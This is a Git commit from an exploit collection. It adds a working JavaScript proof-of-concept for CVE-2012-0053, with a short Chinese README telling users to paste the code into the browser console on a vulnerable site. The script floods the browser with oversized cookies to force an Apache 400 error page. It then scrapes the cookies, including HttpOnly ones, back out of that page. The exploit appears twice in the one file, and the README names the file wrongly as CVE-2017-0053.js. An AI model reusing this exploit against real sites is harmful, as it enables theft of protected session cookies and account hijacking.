Add CVE-2012-0053

1go0 · Dec 1, 2017 · dd7aa7f · dd7aa7f
1 parent 5101b11
commit dd7aa7f
Show file tree

Hide file tree

Showing 2 changed files with 115 additions and 0 deletions.
diff --git a/CVE_EXP/CVE-2012-0053/CVE-2012-0053.js b/CVE_EXP/CVE-2012-0053/CVE-2012-0053.js
@@ -0,0 +1,105 @@
+// Most browsers limit cookies to 4k characters, so we need multiple
+function setCookies (good) {
+    // Construct string for cookie value
+    var str = "";
+    for (var i=0; i< 819; i++) {
+        str += "x";
+    }
+    // Set cookies
+    for (i = 0; i < 10; i++) {
+        // Expire evil cookie
+        if (good) {
+            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
+        }
+        // Set evil cookie
+        else {
+            var cookie = "xss"+i+"="+str+";path=/";
+        }
+        document.cookie = cookie;
+    }
+}
+
+function makeRequest() {
+    setCookies();
+
+    function parseCookies () {
+        var cookie_dict = {};
+        // Only react on 400 status
+        if (xhr.readyState === 4 && xhr.status === 400) {
+            // Replace newlines and match <pre> content
+            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+            if (content.length) {
+                // Remove Cookie: prefix
+                content = content[1].replace("Cookie: ", "");
+                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
+                // Add cookies to object
+                for (var i=0; i<cookies.length; i++) {
+                    var s_c = cookies[i].split('=',2);
+                    cookie_dict[s_c[0]] = s_c[1];
+                }
+            }
+            // Unset malicious cookies
+            setCookies(true);
+            alert(JSON.stringify(cookie_dict));
+        }
+    }
+    // Make XHR request
+    var xhr = new XMLHttpRequest();
+    xhr.onreadystatechange = parseCookies;
+    xhr.open("GET", "/", true);
+    xhr.send(null);
+}
+
+makeRequest();// Most browsers limit cookies to 4k characters, so we need multiple
+function setCookies (good) {
+    // Construct string for cookie value
+    var str = "";
+    for (var i=0; i< 819; i++) {
+        str += "x";
+    }
+    // Set cookies
+    for (i = 0; i < 10; i++) {
+        // Expire evil cookie
+        if (good) {
+            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
+        }
+        // Set evil cookie
+        else {
+            var cookie = "xss"+i+"="+str+";path=/";
+        }
+        document.cookie = cookie;
+    }
+}
+
+function makeRequest() {
+    setCookies();
+
+    function parseCookies () {
+        var cookie_dict = {};
+        // Only react on 400 status
+        if (xhr.readyState === 4 && xhr.status === 400) {
+            // Replace newlines and match <pre> content
+            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+            if (content.length) {
+                // Remove Cookie: prefix
+                content = content[1].replace("Cookie: ", "");
+                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
+                // Add cookies to object
+                for (var i=0; i<cookies.length; i++) {
+                    var s_c = cookies[i].split('=',2);
+                    cookie_dict[s_c[0]] = s_c[1];
+                }
+            }
+            // Unset malicious cookies
+            setCookies(true);
+            alert(JSON.stringify(cookie_dict));
+        }
+    }
+    // Make XHR request
+    var xhr = new XMLHttpRequest();
+    xhr.onreadystatechange = parseCookies;
+    xhr.open("GET", "/", true);
+    xhr.send(null);
+}
+
+makeRequest();
diff --git a/CVE_EXP/CVE-2012-0053/README.md b/CVE_EXP/CVE-2012-0053/README.md
@@ -0,0 +1,10 @@
+# CVE-2012-0053
+
+## POC
+* 来自[]()
+* []()
+
+## 利用方法
+
+1. 打开Google，访问存在此漏洞的网站。
+2. F12开启控制台,Console,将CVE-2017-0053.js中的代码复制出来，并且放在Console中执行。